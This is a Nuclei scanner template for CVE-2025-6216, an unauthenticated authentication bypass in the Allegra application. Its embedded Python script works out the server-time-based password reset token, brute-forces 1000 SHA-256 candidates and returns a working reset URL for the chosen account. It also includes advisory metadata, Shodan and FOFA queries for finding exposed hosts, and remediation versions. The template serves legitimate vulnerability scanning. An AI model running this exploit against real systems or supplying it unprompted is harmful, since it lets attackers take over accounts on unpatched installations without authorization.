id: CVE-2025-6216 info: name: Allegra - Authentication Bypass via Predictable Password Reset Token author: iamnoooob,pdresearch severity: critical description: | Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application. impact: | An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity. remediation: | Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability. reference: - https://www.zerodayinitiative.com/advisories/ZDI-25-410/ - https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2 - https://nvd.nist.gov/vuln/detail/CVE-2025-6216 classification: epss-score: 0.52525 epss-percentile: 0.97986 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-6216 cwe-id: CWE-640 cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: alltena product: allegra shodan-query: http.favicon.hash:"284403119" fofa-query: icon_hash="284403119" tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset,vuln variables: email: "admin@mydomainxxx.com" # Change to a test account flow: http(1) && code() http: - raw: - | POST /resetPassword.action HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID= extractors: - type: regex name: date_header part: header internal: true group: 1 regex: - "Date: (.*)" matchers-condition: and matchers: - type: word words: - "emailSent" - '"success":true' condition: and - type: status status: - 200 code: - engine: - py - python3 # requires python to be pre-installed on system running nuclei source: | import requests import hashlib,os import time from datetime import datetime, timezone from email.utils import parsedate_to_datetime def get_server_time(response): date_header = response.headers.get('Date') if date_header: return parsedate_to_datetime(date_header) return None def main(): BASE_URL = os.getenv("BaseURL") EMAIL = os.getenv("email") date_header = os.getenv("date_header") server_time = parsedate_to_datetime(date_header) if not server_time: return server_time_ms = int(server_time.timestamp() * 1000) expiry_time_ms = server_time_ms + 28800000 base_expiry_sec = (expiry_time_ms // 1000) * 1000 for ms in range(1000): candidate_expiry_ms = base_expiry_sec + ms token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest() test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}" r = requests.get(test_url, allow_redirects=False) if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text: print(test_url) return if __name__ == "__main__": main() matchers: - type: dsl dsl: - contains(code_response, "/resetPassword!confirm.action?ctk=") extractors: - type: dsl # type of the extractor dsl: - '"Reset URL: " + code_response' # digest: 4a0a0047304502207b0782b57e05d58f2ad4dc3c9c0f6da93d134328989e9d9f269f4b8fe16066bc022100eb80e40e37a6b7dd68b0aef9e0ee4b61e0373eef43f9bdc6c6d7f4744c60ad4c:922c64590222798bb761d5b6d8e72950